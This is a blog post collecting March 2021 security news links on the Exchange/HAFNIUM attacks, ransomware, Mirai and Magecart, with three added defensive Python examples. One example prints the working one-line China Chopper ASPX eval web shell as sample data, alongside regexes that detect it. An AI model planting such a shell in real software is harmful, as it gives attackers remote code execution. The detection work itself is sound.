This posting is here to collect cyber security news in March 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
342 Comments
Tomi Engdahl says:
Judge rules Google has to face lawsuit that claims it tracks users even in Incognito mode
The plaintiffs allege Google collects personal data even if users put privacy controls in place
https://www.theverge.com/2021/3/13/22329240/judge-rules-google-5-billion-lawsuit-tracking-chrome-incognito-privacy
Tomi Engdahl says:
Exchange servers first compromised by Chinese hackers hit with ransomware
As if Exchange users didn’t already have enough to worry about, they have this.
https://arstechnica.com/gadgets/2021/03/ransomware-gangs-hijack-7000-exchange-servers-first-hit-by-chinese-hackers/?utm_social-type=owned&utm_source=facebook&utm_brand=ars&utm_medium=social
Tomi Engdahl says:
How Quickly Are We Patching Microsoft Exchange Servers?
https://blog.paloaltonetworks.com/2021/03/patching-microsoft-exchange-servers/
Fifteen years ago, if you accidentally exposed a device on the
Internet, it might go unnoticed by attackers for months or even years.
Things are different today – attackers scrutinize your attack surface
daily. With open source software anyone can download, an attacker can
communicate with every public-facing IP address in IPv4 space in
hours. Any unpatched system, misconfiguration or accidental exposure
is likely to be discovered very quickly. The internet is tiny.
HAFNIUM, China Chopper and ASP.NET Runtime
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/
The China Chopper server-side ASPX web shell is extremely small and
typically, the entire thing is just one line. There are multiple
versions of this web shell for executing code in different languages
such as ASP, ASPX, PHP, JSP, and CFM. In this blog, we will cover the
JScript version; however, they all are very similar aside from the
language used.
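The Trustwave post above describes the one-line ASPX/JScript China Chopper shell: a page directive followed by an eval of request-controlled data with the JScript "unsafe" flag. As an added example (my code, not Trustwave's and not taken from any of the linked articles), here is a small scanner that walks a web root for that pattern and for rewritten variants of it. The directory names and file contents in build_demo_tree() are constructed for the demo; the regex is a starting point for hunting, not a complete signature.

```python
import re
import tempfile
from pathlib import Path

# The classic one-line ASPX China Chopper (JScript flavour) looks like
#   <%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>
# The strongest indicator is eval() fed request-controlled data together with
# the JScript "unsafe" flag. The regex tolerates whitespace and quote style and
# accepts Request.Item[...] as well as Request[...].
CHOPPER_EVAL_RE = re.compile(
    r'eval\s*\(\s*Request(?:\.Item)?\s*\[\s*["\'][^"\']*["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)',
    re.IGNORECASE,
)
JSCRIPT_PAGE_RE = re.compile(r'<%@\s*Page\s+Language\s*=\s*["\']?jscript', re.IGNORECASE)

# Server-side script extensions worth looking at under an IIS web root.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx"}


def classify(text: str) -> str:
    """Return a verdict for one file's contents."""
    if CHOPPER_EVAL_RE.search(text):
        return "china_chopper_eval"
    low = text.lower()
    # Looser rule for rewritten variants: a JScript page that both reads the
    # request and calls eval() is rarely legitimate in an Exchange web root.
    if JSCRIPT_PAGE_RE.search(text) and "request" in low and "eval" in low:
        return "suspicious_jscript_eval"
    return "clean"


def scan_tree(root: str):
    """Walk a web root and return sorted (relative path, verdict) pairs for flagged files."""
    findings = []
    base = Path(root)
    for path in base.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        verdict = classify(text)
        if verdict != "clean":
            findings.append((path.relative_to(base).as_posix(), verdict))
    return sorted(findings)


def build_demo_tree() -> str:
    """Constructed sample tree for the demo; these are not files from a real incident."""
    root = tempfile.mkdtemp(prefix="webroot_demo_")
    samples = {
        "aspnet_client/shell.aspx":
            '<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>',
        "owa/auth/variant.aspx":
            '<%@ Page Language="Jscript"%><%var c = Request.Form["c"]; eval(c, "unsafe");%>',
        "owa/auth/logon.aspx":
            '<%@ Page Language="C#" %><html><body>Sign in</body></html>',
        "owa/auth/notes.txt":
            'eval(Request.Item["x"],"unsafe")',  # wrong extension: not a server-side script
    }
    for rel, body in samples.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


if __name__ == "__main__":
    for rel, verdict in scan_tree(build_demo_tree()):
        print(f"{verdict:26} {rel}")
```

Run it against a copy of the Exchange web root (inetpub\wwwroot and the Exchange FrontEnd\HttpProxy directories) rather than the live server, and treat a hit as a trigger for full incident response, not as something to delete and forget: the shell is the persistence, not the initial access.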
Tomi Engdahl says:
Microsoft Exchange server exploitation: how to detect, mitigate, and
stay calm
https://redcanary.com/blog/microsoft-exchange-attacks/
Red Canary Intel is tracking multiple activity clusters exploiting
vulnerable Microsoft Exchange servers to drop web shells, including
one we’ve dubbed “Sapphire Pigeon.”
A quiet catastrophe is under way online: “dozens or hundreds of
Vastaamo-type data breaches”
https://www.is.fi/digitoday/tietoturva/art-2000007861992.html
The breach known as ProxyLogon, which targets Microsoft's email
servers, is extensive, and data is being stolen all the time. Finns'
ability to respond to the threat varies.
Tomi Engdahl says:
Telia Inmics-Nebula shut down entrepreneurs' email; the outage has
already lasted over 4 days
https://www.tivi.fi/uutiset/tv/32465f1b-8d6d-47df-a01c-9d943517f284
An email outage lasting for days can make life uncomfortable. Life is
uncomfortable right now for some of Telia Inmics-Nebula's business
customers.
Tomi Engdahl says:
Phishing sites now detect virtual machines to bypass detection
https://www.bleepingcomputer.com/news/security/phishing-sites-now-detect-virtual-machines-to-bypass-detection/
Phishing sites are now using JavaScript to evade detection by checking
whether a visitor is browsing the site from a virtual machine or
headless device.
Tomi Engdahl says:
Want to add security easily? Here is the easiest way to set up
two-factor authentication
https://www.kauppalehti.fi/uutiset/haluatko-lisata-tietoturvaa-helposti-nain-kaksivaiheinen-tunnistautuminen-tapahtuu-helpoimmin/c7e1ef81-e46a-422d-885b-8bf82f3a9c8b
Do you know how to keep your data safe online? Account security can
easily be improved with two-factor authentication. [FOR SUBSCRIBERS]
Tomi Engdahl says:
Microsoft 365 outage knocks down Teams, Exchange Online
https://www.bleepingcomputer.com/news/microsoft/microsoft-365-outage-knocks-down-teams-exchange-online/
A Microsoft 365 outage is preventing users from logging into Microsoft
Teams, Exchange Online, Forms, Xbox Live, and Yammer. Based on
reports from users, this appears to be a worldwide outage.
Tomi Engdahl says:
Joseph Cox / VICE:
Hacker paid a company called Sakari $16 to reroute a reporter’s texts and used SMS 2FA to break into his accounts, showing the need for regulation of SMS tools — A gaping flaw in SMS lets hackers take over phone numbers in minutes, by simply paying a company to reroute text messages. — Joseph Cox
A Hacker Got All My Texts for $16
A gaping flaw in SMS lets hackers take over phone numbers in minutes by simply paying a company to reroute text messages.
https://www.vice.com/en/article/y3g8wb/hacker-got-my-texts-16-dollars-sakari-netnumber
Tomi Engdahl says:
Google Releases PoC Exploit for Browser-Based Spectre Attack
https://www.securityweek.com/google-releases-poc-exploit-browser-based-spectre-attack
Tomi Engdahl says:
Hackers stole NFTs from Nifty Gateway users
‘We have seen no indication of compromise of the Nifty Gateway platform’
https://www.theverge.com/2021/3/15/22331818/nifty-gateway-hack-steal-nfts-credit-card
Over the weekend, some users of NFT marketplace Nifty Gateway said hackers stole digital artwork worth thousands of dollars from their accounts. Some people who were hacked also said their credit cards on file were used to purchase additional NFTs, also costing thousands of dollars, which were then transferred away to a hacker’s account.
Nifty Gateway confirmed in a statement to The Verge that some accounts without two-factor authentication had been hacked and that it has been in touch with those affected, but it said it has not seen evidence that its platform was breached. Nifty Gateway suggests the hackers may have successfully reused login credentials that leaked from other services.
Over the past few weeks, many NFTs have suddenly become high-value assets; Grimes sold a series of 10 digital artworks for around $6 million, for example, and digital artist Beeple sold an NFT for $69 million at Christie’s. So it’s unfortunately not altogether surprising that NFT platforms have become targets for hackers looking to steal the digital artworks or take credit card information to buy more.
WHAT’S AN NFT?
NFTs allow you to buy and sell ownership of unique digital items and keep track of who owns them using the blockchain. NFT stands for “non-fungible token,” and it can technically contain anything digital, including drawings, animated GIFs, songs, or items in video games. An NFT can either be one-of-a-kind, like a real-life painting, or one copy of many, like trading cards, but the blockchain keeps track of who has ownership of the file.
NFTs have been making headlines lately, some selling for millions of dollars, with high-profile memes like Nyan Cat and the “deal with it” sunglasses being put up for auction. There’s also a lot of discussion about the massive electricity use and environmental impacts of NFTs. If you (understandably) still have questions, you can read through our NFT FAQ.
Tomi Engdahl says:
One-Click Microsoft Exchange On-Premises Mitigation Tool March 2021
https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
Microsoft has released a new, one-click mitigation tool, Microsoft
Exchange On-Premises Mitigation Tool to help customers who do not have
dedicated security or IT teams to apply these security updates. We
have tested this tool across Exchange Server 2013, 2016, and 2019
deployments. This new tool is designed as an interim mitigation for
customers who are unfamiliar with the patch/update process or who have
not yet applied the on-premises Exchange security update.
The Microsoft Exchange hacks: How they started and where we are
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/
With patches released and proof-of-concept (PoC) exploit code
surfacing online, thousands of Microsoft Exchange servers worldwide
continue to remain vulnerable and the number of attacks is still at a
worrying level.
Tomi Engdahl says:
McAfee Defender’s Blog: Operation Dianxun
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-operation-dianxun
In a recent report the McAfee Advanced Threat Research (ATR) Strategic
Intelligence team disclosed an espionage campaign, targeting
telecommunication companies, named Operation Diànxùn. The tactics,
techniques and procedures (TTPs) used in the attack are like those
observed in earlier campaigns publicly attributed to the threat actors
RedDelta and Mustang Panda. Most probably this threat is targeting
people working in the telecommunications industry and has been used
for espionage purposes to access sensitive data and to spy on
companies related to 5G technology.
Tomi Engdahl says:
New Mirai Variant Targeting Network Security Devices
https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
The attacks are still ongoing at the time of this writing. Upon
successful exploitation, the attackers try to download a malicious
shell script, which contains further infection behaviors such as
downloading and executing Mirai variants and brute-forcers.
Tomi Engdahl says:
Microsoft’s latest cloud authentication outage: What went wrong
https://www.zdnet.com/article/microsofts-latest-cloud-authentication-outage-what-went-wrong/
Microsoft is saying a ‘rotation of keys’ that handle authentication
was to blame for a roughly 14-hour Azure outage that took down Office
365, Dynamics 365, Xbox Live and other Microsoft services on March
15. Also: https://status.azure.com/en-us/status/history/
Tomi Engdahl says:
Top 10 Cloud Malware Threats
https://www.intezer.com/blog/cloud-security/top-10-cloud-malware-threats/
For a long time Linux has not been seen as a serious target of threat
actors. This operating system makes up such a small percentage of the
desktop market share compared to Windows, it’s no surprise why threat
actors would focus most of their attention on attacking Windows
endpoints. Times are quickly changing though as the next major
battleground moves from traditional on-premise Windows endpoints to
Linux-based servers and containers in the cloud. For perspective 90%
of the public cloud runs Linux. Attackers are taking note. Some have
started to write new malware from scratch exclusively for Linux, while
others are adapting their existing Windows malware to target Linux.
Tomi Engdahl says:
Magecart Attackers Save Stolen Credit-Card Data in .JPG File
https://threatpost.com/magecart-attackers-stolen-data-jpg/164815/
Magecart attackers have found a new way to hide their nefarious online
activity by saving data they’ve skimmed from credit cards online in
a .JPG file on a website they’ve injected with malicious code. “The
creative use of the fake .JPG allows an attacker to conceal and store
harvested credit card details for future use without gaining too much
attention from the website owner,” he wrote.
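A file that is called .JPG but is not a JPEG, and that contains card-number-shaped data, is exactly the drop file the Threatpost item above describes. The following added check (my code, not from the article or from Sucuri) scans image files for two things together: the bytes do not start with the JPEG SOI marker, and the content holds 13-19 digit runs that pass the Luhn checksum, either in plaintext or inside a long base64 run (the base64 layer is an assumption about how such drops are typically encoded, not something the article states). All sample files are constructed, and the card numbers are the public test numbers, not real cards.

```python
import base64
import re
import tempfile
from pathlib import Path

JPEG_SOI = b"\xff\xd8\xff"   # a real JPEG starts with the SOI marker and a second marker byte
DIGIT_RUN_RE = re.compile(rb"(?<!\d)\d{13,19}(?!\d)")
B64_RUN_RE = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def layers(data: bytes):
    """Yield the raw bytes and the decoding of any long base64 run inside them."""
    yield data
    for m in B64_RUN_RE.finditer(data):
        try:
            yield base64.b64decode(m.group(), validate=True)
        except ValueError:   # binascii.Error is a ValueError subclass
            continue


def analyze(data: bytes) -> dict:
    """Flag non-JPEG content that carries Luhn-valid card-length digit runs."""
    is_jpeg = data.startswith(JPEG_SOI)
    hits = set()
    for layer in layers(data):
        for m in DIGIT_RUN_RE.finditer(layer):
            pan = m.group().decode()
            if luhn_ok(pan):
                hits.add(pan)
    return {"is_jpeg": is_jpeg, "luhn_hits": len(hits),
            "suspicious": (not is_jpeg) and bool(hits)}


def scan_images(root: str):
    """Return (file name, suspicious) for every *.jpg in a directory, sorted by name."""
    out = []
    for path in sorted(Path(root).glob("*.jpg")):
        out.append((path.name, analyze(path.read_bytes())["suspicious"]))
    return out


def build_demo_dir() -> str:
    """Constructed samples; the card numbers are public test numbers, not real cards."""
    root = tempfile.mkdtemp(prefix="img_demo_")
    real_jpeg = JPEG_SOI + b"\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 48 + b"\xff\xd9"
    skimmed = b"4111111111111111|12/24|123|Jane Doe\n5555555555554444|01/25|456|John Roe\n"
    samples = {
        "banner.jpg": real_jpeg,                          # genuine image, ignored
        "drop.jpg": skimmed,                              # plaintext drop file
        "drop_b64.jpg": base64.b64encode(skimmed),        # encoded drop file
        "order.jpg": b"order-1234567890123456 shipped",   # digit run that fails Luhn
    }
    for name, body in samples.items():
        Path(root, name).write_bytes(body)
    return root


if __name__ == "__main__":
    for name, flagged in scan_images(build_demo_dir()):
        print(f"{'SUSPICIOUS' if flagged else 'ok':10} {name}")
```

The magic-byte test is deliberately the gate: a genuine JPEG with digits in its EXIF data is not flagged, so the check errs on the side of few false positives. A drop file that is a real image with data appended after the EOI marker would need a stricter parser that checks for trailing bytes.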
Tomi Engdahl says:
Russia Threatens to Block Twitter in a Month
https://www.securityweek.com/russia-threatens-block-twitter-month
Russian authorities said Tuesday they would block Twitter in a month if it doesn’t take steps to remove banned content, a move that escalates the Russian government’s drawn-out standoff with social media platforms that have played a major role in amplifying dissent in Russia.
Russia’s state communications watchdog, Roskomnadzor, last week announced it was slowing down the speed of uploading photos and videos to Twitter over its alleged failure to remove content encouraging suicide among children and information about drugs and child pornography.
The agency said Twitter has failed to remove more than 3,000 posts with banned content, including more than 2,500 posts encouraging suicide among minors. The platform responded by emphasizing its policy of zero tolerance for child sexual exploitation, promotion of suicide and drug sales.
Tomi Engdahl says:
Danny Palmer / ZDNet:
McAfee researchers detail a Chinese cyberespionage campaign targeting at least 23 telcos in the US, Europe, and SE Asia to steal data, including for 5G tech — Cybersecurity researchers at McAfee detail an ongoing cyber espionage campaign which is targeting telecoms companies around the world.
Hackers are targeting telecoms companies to steal 5G secrets
https://www.zdnet.com/article/hackers-are-targeting-telecoms-companies-to-steal-5g-secrets/
Cybersecurity researchers at McAfee detail an ongoing cyber-espionage campaign that is targeting telecoms companies around the world.
Tomi Engdahl says:
Microsoft’s latest cloud authentication outage: What went wrong
https://www.zdnet.com/article/microsofts-latest-cloud-authentication-outage-what-went-wrong/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem%3A+Trending+Content&utm_medium=trueAnthem&utm_source=facebook
Microsoft is saying a ‘rotation of keys’ that handle authentication was to blame for a roughly 14-hour Azure outage that took down Office 365, Dynamics 365, Xbox Live and other Microsoft services on March 15.
Microsoft’s preliminary analysis of the incident, published March 16, indicated that “an error occurred in the rotation of keys used to support Azure AD’s use of OpenID, and other, Identity standard protocols for cryptographic signing operations,” according to the findings published to its Azure Status History page.
https://status.azure.com/en-us/status/history/
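Both Azure AD outage comments above come down to the same thing: a signing-key rotation that goes wrong takes down every relying party at once, because tokens signed under the key that just vanished stop verifying. The following added example (mine, not Microsoft's implementation, and using HMAC secrets in place of the RSA keys an OpenID provider would publish) shows the overlap discipline that avoids the failure: publish the new key before signing with it, keep the old key in the set until the last token it signed has expired, and let verifiers pick the key by kid. Token format, key ids and clock values are made up for the demo.

```python
import base64
import hashlib
import hmac
import json
import secrets


def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64u_dec(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


class KeyRing:
    """Published signing keys (think JWKS) plus the key new tokens are signed with."""

    def __init__(self, now):
        self.now = now        # injectable clock so the scenario below is deterministic
        self.keys = {}        # kid -> [secret, retire_after or None]
        self.current = None

    def publish(self, kid):
        """Step 1: add the key to the published set before anything signs with it."""
        self.keys[kid] = [secrets.token_bytes(32), None]

    def promote(self, kid, token_ttl):
        """Step 2: sign with the new key; retire the old one only after its last token can expire."""
        if self.current is not None:
            self.keys[self.current][1] = self.now() + token_ttl
        self.current = kid

    def purge(self):
        """Step 3: drop retired keys once their retention deadline has passed."""
        for kid, (_, retire_after) in list(self.keys.items()):
            if retire_after is not None and self.now() >= retire_after:
                del self.keys[kid]

    def sign(self, claims, ttl):
        header = {"alg": "HS256", "kid": self.current}
        payload = dict(claims, exp=self.now() + ttl)
        signing_input = b64u(json.dumps(header).encode()) + "." + b64u(json.dumps(payload).encode())
        sig = hmac.new(self.keys[self.current][0], signing_input.encode(), hashlib.sha256).digest()
        return signing_input + "." + b64u(sig)

    def verify(self, token):
        try:
            h, p, s = token.split(".")
            header, payload, sig = json.loads(b64u_dec(h)), json.loads(b64u_dec(p)), b64u_dec(s)
        except ValueError:
            return False, "malformed"
        key = self.keys.get(header.get("kid"))
        if key is None:
            return False, "unknown kid"   # what every verifier sees after a hard cutover
        expected = hmac.new(key[0], (h + "." + p).encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, sig):
            return False, "bad signature"
        if payload.get("exp", 0) <= self.now():
            return False, "expired"
        return True, "ok"


def run_scenario():
    """Rotate kid-a -> kid-b with a 3600 s overlap and record what verifiers see."""
    clock = [1_000_000]
    now = lambda: clock[0]
    ttl = 3600
    ring = KeyRing(now)
    ring.publish("kid-a")
    ring.promote("kid-a", token_ttl=ttl)
    old_token = ring.sign({"sub": "alice"}, ttl=ttl)        # exp = 1_003_600

    clock[0] += 1000                                         # rotation happens here
    ring.publish("kid-b")
    ring.promote("kid-b", token_ttl=ttl)                     # kid-a retires at 1_004_600
    ring.purge()                                             # nothing is due yet
    new_token = ring.sign({"sub": "bob"}, ttl=ttl)
    results = {
        "old_token_during_overlap": ring.verify(old_token)[0],
        "new_token_during_overlap": ring.verify(new_token)[0],
    }
    # Same kid, different secret: a verifier must not accept it just because the kid is known.
    forger = KeyRing(now)
    forger.publish("kid-b")
    forger.promote("kid-b", token_ttl=ttl)
    results["forged_token"] = ring.verify(forger.sign({"sub": "mallory"}, ttl=ttl))
    # Anti-pattern: a hard cutover that drops kid-a immediately rejects still-valid tokens.
    hard_cutover = KeyRing(now)
    hard_cutover.keys = {"kid-b": ring.keys["kid-b"]}
    hard_cutover.current = "kid-b"
    results["old_token_after_hard_cutover"] = hard_cutover.verify(old_token)
    # After the retention deadline kid-a is purged; its tokens have all expired by then.
    clock[0] = 1_001_000 + ttl
    ring.purge()
    results["kid_a_retained"] = "kid-a" in ring.keys
    results["old_token_after_retention"] = ring.verify(old_token)
    return results


if __name__ == "__main__":
    for k, v in run_scenario().items():
        print(f"{k:30} {v}")
```

The retention deadline is the whole point: it is derived from the longest token lifetime issued under the old key, so purge() can never remove a key that an unexpired token still depends on. In a real OpenID deployment the verifiers also cache the key set, so the overlap must additionally cover their cache refresh interval.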
Tomi Engdahl says:
Microsoft Exchange Server: These quarterly updates include fixes for
security flaws
https://www.zdnet.com/article/microsoft-exchange-server-these-quarterly-updates-include-fixes-for-security-flaws/
Microsoft has released its March 2021 quarterly cumulative updates for
Exchange Server 2016 and Exchange Server 2019, which include the
security updates to address critical flaws that are currently under
attack. Also:
https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-quarterly-exchange-updates/ba-p/2205283
Tomi Engdahl says:
PYSA Ransomware Pillages Education Sector, Feds Warn
https://threatpost.com/pysa-ransomware-education-feds-warn/164832/
A major spike of attacks against higher ed, K-12 and seminaries in
March has prompted the FBI to issue a special alert. In a “Flash”
alert to the cybersecurity community issued on Tuesday, the Feds said
that PYSA has been seen in attacks on schools in 12 U.S. states and in
the United Kingdom in March alone.
Tomi Engdahl says:
Mastermind of 2020’s top celebrity Twitter hack sentenced to 3 years
https://www.hackread.com/twitter-hack-mastermind-jailed-2020-celebrity-hack/
Graham Ivan Clark, the mastermind of the high-profile Twitter hack
leading to the Bitcoin scam on July 15th, 2020 has been sentenced to 3
years in prison. Clark was arrested on July 31st, 2020 from Tampa,
Florida when he was 17 and charged with multiple counts of organized
fraud, communications fraud, fraudulent use of personal information,
and accessing computer or electronic device without authority.
US Teen ‘Mastermind’ in Epic Twitter Hack Sentenced to Prison
https://www.securityweek.com/florida-teen-sentenced-hack-celebrity-twitter-accounts
A Florida teenager accused of masterminding a Twitter hack of celebrity accounts in a crypto currency scheme has been sentenced to three years in juvenile prison in a plea agreement, officials said.
State prosecutors announced the deal Tuesday in the case of Graham Ivan Clark, 18, described as the mastermind of the July 2020 “Bit-Con” worldwide hack of Twitter accounts of Elon Musk, Bill Gates, Barack Obama, Joe Biden and others.
Hillsborough County State Attorney Andrew Warren said Clark, who was 17 when he was charged, would serve three years in a juvenile prison followed by three years probation, the maximum allowed under Florida’s Youthful Offender Act.
If Clark violates his probation, he will face a minimum 10-year sentence in adult prison.
Tomi Engdahl says:
Mimecast Says SolarWinds Hackers Stole Source Code
https://www.securityweek.com/mimecast-says-solarwinds-hackers-stole-source-code
Email security company Mimecast on Tuesday said it completed its forensic investigation into the impact of the SolarWinds supply chain attack, and revealed that the threat actor managed to steal some source code.
Mimecast was one of the several cybersecurity companies to confirm being targeted by the hackers who breached the systems of IT management solutions provider SolarWinds.
Tomi Engdahl says:
New Mirai Variant Leverages 10 Vulnerabilities to Hijack IoT Devices
https://www.securityweek.com/new-mirai-variant-leverages-10-vulnerabilities-hijack-iot-devices
Over the past month, a variant of the Mirai botnet was observed targeting new security vulnerabilities within hours after they had been disclosed publicly, researchers with Palo Alto Networks reveal.
Around since 2016, Mirai has had its source code leaked online, which resulted in tens of variants being released over the years, each with its own targeting capabilities.
What makes the variant tracked by Palo Alto Networks stand out in the crowd is the fact that, within a four-week timeframe, it started exploiting several vulnerabilities that have been disclosed this year.
On February 23, the Mirai variant was observed targeting CVE-2021-27561 and CVE-2021-27562, two vulnerabilities in the Yealink DM (Device Management) platform that had been disclosed the very same day.
Impacting Yealink DM version 3.6.0.20 and older, the flaws (pre-auth SSRF and command injection, respectively) exist because user-provided data is not properly filtered and could be exploited to execute arbitrary commands as root, without authentication.
On March 3, Palo Alto Networks’ security researchers noticed that the same samples were also using an exploit for CVE-2021-22502, a critical (CVSS score of 9.8) remote code execution vulnerability in Micro Focus Operations Bridge Reporter.
Exploitable without authentication, the security bug exists because a user-supplied string isn’t properly validated when the Token parameter provided to the LogonResource endpoint is handled, allowing an attacker to execute code as root.
Ten days later, on March 13, the samples also incorporated an exploit targeting CVE-2020-26919, a critical vulnerability (CVSS score 9.8) affecting NETGEAR JGS516PE business-grade gigabit switches. The bug is described as “lack of access control at the function level.”
In September 2020, Netgear published an advisory for this vulnerability, advising customers to update the firmware on their devices.
Other vulnerabilities being exploited in these attacks include a SonicWall SSL-VPN bug referred to as VisualDoor, CVE-2020-25506 (D-Link DNS-320 firewall), CVE-2020-26919 (Netgear ProSAFE Plus), and CVE-2019-19356 (Netis WF2419 wireless router). Three other security issues are also being exploited, but they haven’t been identified yet.
Tomi Engdahl says:
“End of the road. Nothing to do, and no hope of things getting better”?
“Expert” hackers used 11 zerodays to infect Windows, iOS, and Android users
The breadth and abundance of exploits for unknown vulnerabilities sets the group apart.
https://arstechnica.com/information-technology/2021/03/expert-hackers-used-11-zerodays-to-infect-windows-ios-and-android-users/
A team of advanced hackers exploited no fewer than 11 zeroday vulnerabilities in a nine-month campaign that used compromised websites to infect fully patched devices running Windows, iOS, and Android, a Google researcher said.
Using novel exploitation and obfuscation techniques, a mastery of a wide range of vulnerability types, and a complex delivery infrastructure, the group exploited four zerodays in February 2020. The hackers’ ability to chain together multiple exploits that compromised fully patched Windows and Android devices led members of Google’s Project Zero and Threat Analysis Group to call the group “highly sophisticated.”
Not over yet
Tomi Engdahl says:
Sean Coughlan / BBC:
London police warn students about using Sci-Hub, calling the self-described “pirate” site for research papers “a threat to their personal information and data” — Police have warned students in the UK against using a website that they say lets users “illegally access” millions of scientific research papers.
Police warn students to avoid science website
https://www.bbc.com/news/education-56462390
Police have warned students in the UK against using a website that they say lets users “illegally access” millions of scientific research papers.
The City of London police’s Intellectual Property Crime Unit says using the Sci-Hub website could “pose a threat” to students’ personal data.
The police are concerned that users of the “Russia-based website” could have information taken and misused online.
The Sci-Hub website says it “removes all barriers” to science.
It offers open access to more than 85 million scientific papers and claims that copyright laws should be abolished and that such material should be “knowledge to all”.
It describes itself as “the first pirate website in the world to provide mass and public access to tens of millions of research papers”.
University ‘threat’
But Max Bruce, the City of London police’s cyber protection officer, has urged universities to block the website on their networks because of the “threat posed by Sci-Hub to both the university and its students”.
“If you’re tricked into revealing your log-in credentials, whether it’s through the use of fake emails or malware, we know that Sci-Hub will then use those details to compromise your university’s computer network in order to steal research papers,” he said.
The City of London Police, which is the national lead for fraud, has warned that students studying online at home might be vulnerable.
‘Access to research’
The police warning says scientific papers could have been obtained by a “variety of malicious means, such as the use of phishing emails to trick university staff and students into divulging their login credentials”.
But the Sci-Hub website has previously told the BBC that it provides students with access to research papers for which the subscriptions are “very expensive”.
Tomi Engdahl says:
Catalin Cimpanu / The Record:
Verkada security camera hacker has been charged in the US for hacking into 100+ of the world’s biggest companies since 2019 and leaking proprietary data online
More: U.S. Department of Justice, The Verge, Forbes, HackRead, Dark Reading, infosecurity-magazine.com, PCMag, Gizmodo, New York Post, San Francisco Business Journal, The Hacker News, and Silicon Republic
Verkada hacker charged in the US for hacking more than 100 companies
https://therecord.media/verkada-hacker-charged-in-the-us-for-hacking-more-than-100-companies/
The US Department of Justice today charged a Swiss national with hacking into more than 100 companies and leaking proprietary data online on their personal website.
The hacker, Till (more commonly known as Tillie) Kottmann, 21, of Lucerne, Switzerland, is also the individual who breached cloud-based surveillance firm Verkada earlier this month and leaked security camera footage from some of its customers —including streams from companies like Tesla, Cloudflare, Okta, but also jails, schools, and hospitals.
But according to court documents published by the DOJ today, the charges predate Kottmann’s Verkada hack and pertain to the Swiss hacktivist’s activity dating back to 2019, when they began scouring the internet for misconfigured source code repositories owned by major corporations and government organizations.
Tomi Engdahl says:
U.S. charges 21-year-old Swiss “hacktivist” for security-camera theft and leaks
https://www.cbsnews.com/news/till-kottmann-verkada-hack-charged-identity-theft-computer-intrusion/
The Justice Department has charged a Swiss hacker with computer intrusion and identity theft, just over a week after the hacker took credit for helping to break into the online systems of a U.S. security-camera startup. An indictment against 21-year-old Till Kottmann was brought Thursday by a grand jury in the Seattle-based Western District of Washington.
Tomi Engdahl says:
Catalin Cimpanu / The Record:
REvil ransomware gang says it had breached Acer, sharing leaked images of internal docs on the dark web, and is demanding $50M; Acer says it is investigating — Taiwanese computer maker Acer has suffered a ransomware attack over the past weekend at the hands of the REvil ransomware gang …
Ransomware gang demands $50 million from computer maker Acer
https://therecord.media/ransomware-gang-demands-50-million-from-computer-maker-acer/
Taiwanese computer maker Acer has suffered a ransomware attack over the past weekend at the hands of the REvil ransomware gang, which is now demanding a whopping $50 million ransom payment to decrypt the company’s computers and not leak its data on the dark web.
The attack has not disrupted production systems but only hit the company’s back-office network. The security breach was not deemed disruptive enough to prevent or delay the computer maker from announcing its Q4 2020 financial results on Wednesday.
Acer spokespersons played down the incident when reached for comment and avoided confirming it as a ransomware incident.
Here the ransom demand was clearly visible, a whopping $50 million payment request, which represents the highest ransom demand ever requested by a ransomware group.
Acer is the sixth-largest personal computer maker in the world, with a market share of roughly 6% of all global sales. The company reported a total revenue of roughly $3 billion in Q4 2020, hence the record-breaking ransom demand.
Tomi Engdahl says:
“Expert” hackers used 11 0-days to infect Windows, iOS, and Android
users
https://arstechnica.com/information-technology/2021/03/expert-hackers-used-11-zerodays-to-infect-windows-ios-and-android-users/
A team of advanced hackers exploited no fewer than 11 zero-day
vulnerabilities in a nine-month campaign that used compromised
websites to infect fully patched devices running Windows, iOS, and
Android, a Google researcher said. Also:
https://googleprojectzero.blogspot.com/2021/03/in-wild-series-october-2020-0-day.html
Tomi Engdahl says:
REvil ransomware says they hit Acer, Acer reports “abnormal
situations”
https://www.bleepingcomputer.com/news/security/revil-ransomware-says-they-hit-acer-acer-reports-abnormal-situations/
The REvil ransomware operation claims to have stolen unencrypted data
after hacking electronics and computer giant Acer.
Tomi Engdahl says:
Russian pleads guilty to Tesla hacking and extortion attempt
https://www.bleepingcomputer.com/news/security/russian-pleads-guilty-to-tesla-hacking-and-extortion-attempt/
Russian national Egor Igorevich Kriuchkov has pleaded guilty to
recruiting a Tesla employee to plant malware designed to steal data
within the network of Tesla’s Nevada Gigafactory.
Tomi Engdahl says:
Mysterious bug is deleting Microsoft Teams, SharePoint files
https://www.bleepingcomputer.com/news/microsoft/mysterious-bug-is-deleting-microsoft-teams-sharepoint-files/
Microsoft SharePoint and Microsoft Teams users report files are
missing or moved to the Recycle Bin after the recent Azure Active
Directory outage this week.
Tomi Engdahl says:
CISA releases new SolarWinds malicious activity detection tool
